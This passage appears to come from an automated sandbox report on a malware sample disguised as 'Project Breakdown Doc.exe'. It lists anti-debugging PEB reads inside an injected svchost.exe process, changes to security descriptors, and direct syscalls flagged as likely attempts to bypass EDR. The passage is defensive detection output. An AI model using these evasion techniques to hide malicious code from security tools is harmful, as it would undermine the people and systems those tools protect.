                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B364AB mov eax, dword ptr fs:[00000030h]1_2_03B364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA49A mov eax, dword ptr fs:[00000030h]1_2_03BEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B304E5 mov ecx, dword ptr fs:[00000030h]1_2_03B304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]1_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]1_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2E420 mov eax, dword ptr fs:[00000030h]1_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2C427 mov eax, dword ptr fs:[00000030h]1_2_03B2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB6420 mov eax, dword ptr fs:[00000030h]1_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]1_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]1_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68402 mov eax, dword ptr fs:[00000030h]1_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]1_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]1_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5A470 mov eax, dword ptr fs:[00000030h]1_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC460 mov ecx, dword ptr fs:[00000030h]1_2_03BBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEA456 mov eax, dword ptr fs:[00000030h]1_2_03BEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2645D mov eax, dword ptr fs:[00000030h]1_2_03B2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5245A mov eax, dword ptr fs:[00000030h]1_2_03B5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E443 mov eax, dword ptr fs:[00000030h]1_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40BBE mov eax, dword ptr fs:[00000030h]1_2_03B40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40BBE mov eax, dword ptr fs:[00000030h]1_2_03B40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03BE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]1_2_03BE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]1_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]1_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38BF0 mov eax, dword ptr fs:[00000030h]1_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EBFC mov eax, dword ptr fs:[00000030h]1_2_03B5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]1_2_03BBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]1_2_03BDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]1_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]1_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B50BCB mov eax, dword ptr fs:[00000030h]1_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]1_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]1_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30BCD mov eax, dword ptr fs:[00000030h]1_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]1_2_03B5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EB20 mov eax, dword ptr fs:[00000030h]1_2_03B5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]1_2_03BF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF8B28 mov eax, dword ptr fs:[00000030h]1_2_03BF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]1_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]1_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]1_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C02B57 mov eax, dword ptr fs:[00000030h]1_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAEB1D mov eax, dword ptr fs:[00000030h]1_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04B00 mov eax, dword ptr fs:[00000030h]1_2_03C04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2CB7E mov eax, dword ptr fs:[00000030h]1_2_03B2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28B50 mov eax, dword ptr fs:[00000030h]1_2_03B28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDEB50 mov eax, dword ptr fs:[00000030h]1_2_03BDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]1_2_03BE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE4B4B mov eax, dword ptr fs:[00000030h]1_2_03BE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]1_2_03BC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC6B40 mov eax, dword ptr fs:[00000030h]1_2_03BC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFAB40 mov eax, dword ptr fs:[00000030h]1_2_03BFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD8B42 mov eax, dword ptr fs:[00000030h]1_2_03BD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]1_2_03B38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B38AA0 mov eax, dword ptr fs:[00000030h]1_2_03B38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86AA4 mov eax, dword ptr fs:[00000030h]1_2_03B86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B68A90 mov edx, dword ptr fs:[00000030h]1_2_03B68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA80 mov eax, dword ptr fs:[00000030h]1_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04A80 mov eax, dword ptr fs:[00000030h]1_2_03C04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]1_2_03B6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6AAEE mov eax, dword ptr fs:[00000030h]1_2_03B6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30AD0 mov eax, dword ptr fs:[00000030h]1_2_03B30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]1_2_03B64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B64AD0 mov eax, dword ptr fs:[00000030h]1_2_03B64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]1_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]1_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B86ACC mov eax, dword ptr fs:[00000030h]1_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]1_2_03B54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B54A35 mov eax, dword ptr fs:[00000030h]1_2_03B54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA24 mov eax, dword ptr fs:[00000030h]1_2_03B6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5EA2E mov eax, dword ptr fs:[00000030h]1_2_03B5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBCA11 mov eax, dword ptr fs:[00000030h]1_2_03BBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]1_2_03BACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BACA72 mov eax, dword ptr fs:[00000030h]1_2_03BACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]1_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]1_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6CA6F mov eax, dword ptr fs:[00000030h]1_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDEA60 mov eax, dword ptr fs:[00000030h]1_2_03BDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B36A50 mov eax, dword ptr fs:[00000030h]1_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]1_2_03B40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40A5B mov eax, dword ptr fs:[00000030h]1_2_03B40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB89B3 mov esi, dword ptr fs:[00000030h]1_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]1_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB89B3 mov eax, dword ptr fs:[00000030h]1_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A0 mov eax, dword ptr fs:[00000030h]1_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]1_2_03B309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B309AD mov eax, dword ptr fs:[00000030h]1_2_03B309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]1_2_03B629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B629F9 mov eax, dword ptr fs:[00000030h]1_2_03B629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]1_2_03BBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]1_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B649D0 mov eax, dword ptr fs:[00000030h]1_2_03B649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]1_2_03BFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC69C0 mov eax, dword ptr fs:[00000030h]1_2_03BC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C04940 mov eax, dword ptr fs:[00000030h]1_2_03C04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB892A mov eax, dword ptr fs:[00000030h]1_2_03BB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC892B mov eax, dword ptr fs:[00000030h]1_2_03BC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC912 mov eax, dword ptr fs:[00000030h]1_2_03BBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]1_2_03B28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B28918 mov eax, dword ptr fs:[00000030h]1_2_03B28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]1_2_03BAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAE908 mov eax, dword ptr fs:[00000030h]1_2_03BAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]1_2_03BD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD4978 mov eax, dword ptr fs:[00000030h]1_2_03BD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC97C mov eax, dword ptr fs:[00000030h]1_2_03BBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]1_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]1_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B56962 mov eax, dword ptr fs:[00000030h]1_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]1_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E mov edx, dword ptr fs:[00000030h]1_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7096E mov eax, dword ptr fs:[00000030h]1_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB0946 mov eax, dword ptr fs:[00000030h]1_2_03BB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C008C0 mov eax, dword ptr fs:[00000030h]1_2_03C008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBC89D mov eax, dword ptr fs:[00000030h]1_2_03BBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30887 mov eax, dword ptr fs:[00000030h]1_2_03B30887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03B6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]1_2_03B6C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]1_2_03BFA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]1_2_03B5E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov ecx, dword ptr fs:[00000030h]1_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52835 mov eax, dword ptr fs:[00000030h]1_2_03B52835
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C981F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00C981F7
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C6A395
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00C6A364 SetUnhandledExceptionFilter,0_2_00C6A364

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
